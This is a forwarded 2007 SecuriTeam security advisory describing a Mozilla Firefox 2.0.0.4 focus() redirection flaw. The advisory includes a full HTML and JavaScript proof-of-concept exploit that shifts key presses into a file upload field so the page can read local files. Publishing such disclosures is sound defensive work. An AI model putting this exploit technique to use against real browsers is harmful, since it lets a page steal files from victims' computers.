Thread-topic: Mozilla Firefox focus() Redirection Vulnerability
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Wednesday, July 04, 2007 3:16 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NEWS] Mozilla Firefox focus() Redirection Vulnerability
>
>
> Mozilla Firefox focus() Redirection Vulnerability
>
>
>
> A vulnerability in Mozilla Firefox allows the attacker to
> silently redirect focus of selected key press events to an
> otherwise protected file upload form field. This is possible
> because of how onKeyDown event is handled, allowing the focus
> to be moved between the two. This enables the attacker to
> read arbitrary files on victim's system.
>
>
> Vulnerable Systems:
> * Mozilla Firefox version 2.0.0.4 and prior
>
> Exploit:
> <html>
> <body>
> <script>
> function restore()
> {
>
> document.getElementById("text1").value=document.getElementById
> ("file1").value;
> document.getElementById("text1").focus();
> }
>
> function doKeyDown()
> {
> document.getElementById("label1").focus();
> }
> </script>
>
> <input type="file" id="file1" name="file1"
> onkeydown="restore();" onkeyup="restore()" />
> <label for="file1" id="label1" name="label1"></label>
> <br>
> <textarea name="text1" id="text1" onkeydown="doKeyDown()">
> </textarea>
> </body>
> </html>
>
>
> Additional Information:
> The information has been provided by carl hardwick
> <mailto:hardwick.carl@xxxxxxxxx> .
> The original article can be found at:
>
>
>
